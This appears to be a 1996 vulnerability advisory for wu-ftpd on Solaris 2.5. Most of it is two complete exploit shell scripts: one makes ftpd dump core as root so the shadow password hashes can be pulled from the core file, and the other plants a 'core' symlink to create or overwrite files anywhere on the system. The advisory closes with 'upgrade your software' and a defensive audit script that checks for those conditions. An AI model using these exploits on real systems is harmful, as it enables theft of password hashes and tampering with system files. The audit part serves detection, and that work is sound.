COMMAND
wu-ftpd
SYSTEMS AFFECTED
Solaris 2.5 (and surely others)
PROBLEM
With the following scripts you may view the contents of the shadow
password file (wuftpd-shadowdump), or write arbitrary data to
almost anywhere on the system (wuftpd-overwrite). Both are the
result of recently discovered bugs in wu-ftpd, namely, its ability
to dump core as root.
Exploit script for viewing the contents of the shadow password file.
#!/bin/sh
#
# exploit a bug in wu-ftpd to assemble & view the shadow passwd file
#
# Tested under Solaris 2.5
#
# James Abendschan jwa@nbs.nau.edu 16 Oct 1996
#
USER=`whoami`
/usr/ucb/echo -n "Enter your password for localhost: "
read PASS
WDIR=/tmp/wu-ftpd-sploit.$USER
rm -rf $WDIR
mkdir $WDIR
TMP=$WDIR/strings.tmp
ftp -n localhost << _EOF_
quote user $USER
quote pass $PASS
cd $WDIR
user root woot
quote pasv
_EOF_
if [ ! -f $WDIR/core ]
then
echo "Sorry, your ftpd didn't dump core."
exit 1
fi
strings $WDIR/core > $TMP
# try to assemble as much of the shadow passwd file as possible
# (easier in perl)
for user in `cat /etc/passwd | awk -F":" '{print $1}'`
do
line=`grep \^${user}: $TMP`
echo $line
done
rm -f $TMP
Exploit script for writing arbitrary data.
#!/bin/sh
#
# exploit a bug in wu-ftpd to create a file anywhere on the filesystem
# - files that already exist will be overwritten, but they won't
# be writable.
#
# tested under Solaris 2.5
#
# James Abendschan jwa@nbs.nau.edu 16 Oct 1996
#
if [ $# != 2 ]
then
echo "usage: `basename $0` sourcefile dstfile"
exit 1
fi
SRC=$1
TARGET=$2
USER=`whoami`
/usr/ucb/echo -n "Enter your password for localhost: "
read PASS
WDIR=/tmp/wu-ftpd-sploit.$USER
rm -rf $WDIR
mkdir $WDIR
ln -s $TARGET $WDIR/core
ftp -n localhost << _EOF_
quote user $USER
quote pass $PASS
cd $WDIR
user root woot
quote pasv
_EOF_
if [ ! -f $WDIR/core ]
then
echo "Sorry, your ftpd didn't dump core."
exit 1
fi
ls -l $WDIR/core
cp $SRC $TARGET
if [ $? != 0 ]
then
echo "copy of $SRC to $TARGET failed."
exit 1
fi
echo "Done; $SRC should now be $TARGET."
exit 0
SOLUTION
Upgrade your software.
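To check a host for the two conditions the scripts above rely on, a symlink named core waiting in a writable directory and a core file that other users can read, the following audit can be run over directories such as /tmp. It is an added example, not part of the original advisory; the function names, output labels and shadow-record pattern are assumptions of this example.

```shell
#!/bin/sh
# Added example: audit a directory tree for the conditions the two
# scripts above depend on. Names and output labels are this example's own.

# Count lines in a file that look like shadow(4) records
# (name:hash:lastchg:min:max:warn:inactive:expire:flag).
# Only the count is reported, never the records themselves.
shadow_like_lines() {
    tr -c '[:print:]\n' '\n' < "$1" |
        grep -c -E '^[A-Za-z_][A-Za-z0-9_.-]*:[^:]+(:[0-9]*){6}:[^:]*$' || true
}

audit_core_entries() {
    dir=$1
    # A symlink named "core": a root process dumping core in this
    # directory would write through it to the link target.
    find "$dir" -name core -type l 2>/dev/null |
    while IFS= read -r p; do
        printf 'SYMLINK %s -> %s\n' "$p" "$(readlink "$p")"
    done
    # A regular core file that group or other can read, with the number
    # of shadow-like records found in it.
    find "$dir" -name core -type f \( -perm -040 -o -perm -004 \) 2>/dev/null |
    while IFS= read -r p; do
        printf 'READABLE %s shadow_like=%s\n' "$p" "$(shadow_like_lines "$p")"
    done
}

# Usage: audit_core_entries /tmp
```

A READABLE line with a non-zero shadow_like count means the core file should be handled as a password-hash exposure, not just deleted.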